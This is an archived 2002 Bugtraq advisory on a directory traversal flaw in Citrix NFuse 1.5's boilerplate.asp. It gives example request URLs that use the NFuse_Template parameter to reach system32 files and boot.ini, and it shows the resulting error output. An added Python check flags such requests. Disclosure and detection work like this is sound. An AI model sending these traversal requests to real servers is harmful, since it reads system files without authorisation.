[24859] in bugtraq
Citrix Nfuse directory traversal with boilerplate.asp
daemon@ATHENA.MIT.EDU (Eric Budke)
Thu Mar 28 10:30:20 2002
Message-Id: <5.1.0.14.2.20020320170030.02ab3158@pop.panix.com>
Date: Wed, 27 Mar 2002 16:26:36 -0500
To: bugtraq@securityfocus.com
From: Eric Budke <budke@budke.com>
This vulnerability is based on being an authenticated user (as opposed to a
prior bug someone put out for unauthenticated users).
Disclaimer:
My ability to find a resource at Citrix via their web site was not
successful, thus the post here. They have been notified thanks to some
contacts forwarded from people on Bugtraq.
Given that you must be authenticated first, one assumes that you have some
minimal level of trust for the end user, so the severity isn't that high.
I don't have access to large numbers of systems on which to check this and
to check across multiple versions. This should be reproducible, no guarantees.
Solution: According to Citrix this issue is only in Nfuse 1.5 as the
boilerplate.asp goes away in the most recent version. Assuming one
upgrades, this and a number of other non-public (from what I can gather
from Citrix) vulnerabilities go away. I don't have the facilities to test
on the latest version, and for all I know something similar can be done
there. Citrix has been notified; their solution was to upgrade.
A command such as:
http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica
Can be replaced with one like this:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/
It seems to work with things in winnt and winnt/system32; it doesn't seem
to like things back on the c:\, which gives up its very minor vuln of the
path of wwwroot.
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
Gives up:
There was an error:The Citrix HTML template specified does not exist or
could not be accessed. The template file specified was:
c:\inetpub\wwwroot\../../boot.ini
Nice but lacking much use. So it seems we have another directory traversal
issue.
Credits: Professionally I work for Foundstone (www.foundstone.com). This
wouldn't have been found w/o a client engagement through them.
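
Added example, not part of the original post and not Citrix code: a Python check that resolves NFuse_Template the way the error message above suggests the server does (template root joined with the parameter) and flags boilerplate.asp requests whose result leaves that root. The template root and all function names are assumptions; the sample URLs are the ones quoted in the post.

```python
import ntpath
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed template root, taken from the path shown in the error message above.
TEMPLATE_ROOT = r"c:\inetpub\wwwroot"

# Sample input: the three request URLs quoted in the post.
SAMPLE_REQUESTS = [
    "http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica",
    "http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/",
    "http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories",
]


def resolve_template(name, root=TEMPLATE_ROOT):
    """Return the normalized path that a plain root + name join would open."""
    # Decode a bounded number of extra times so encoded separators are seen.
    for _ in range(3):
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    # ntpath applies Windows rules on any host: '/' and '\' both separate,
    # and an absolute or drive-qualified name replaces the root entirely.
    return ntpath.normpath(ntpath.join(root, name))


def escapes_root(name, root=TEMPLATE_ROOT):
    """True if the template name resolves outside the template root."""
    resolved = ntpath.normcase(resolve_template(name, root))
    base = ntpath.normcase(ntpath.normpath(root))
    return resolved != base and not resolved.startswith(base + "\\")


def flag_requests(urls, root=TEMPLATE_ROOT):
    """Yield (url, resolved_path) for boilerplate.asp requests leaving root."""
    for url in urls:
        parts = urlsplit(url)
        if not parts.path.lower().endswith("/boilerplate.asp"):
            continue
        for name in parse_qs(parts.query).get("NFuse_Template", []):
            if escapes_root(name, root):
                yield url, resolve_template(name, root)
```

The same containment test, applied before the template file is opened, is the server-side fix for this class of bug; run over web server logs it serves as a detection for the requests shown in the post.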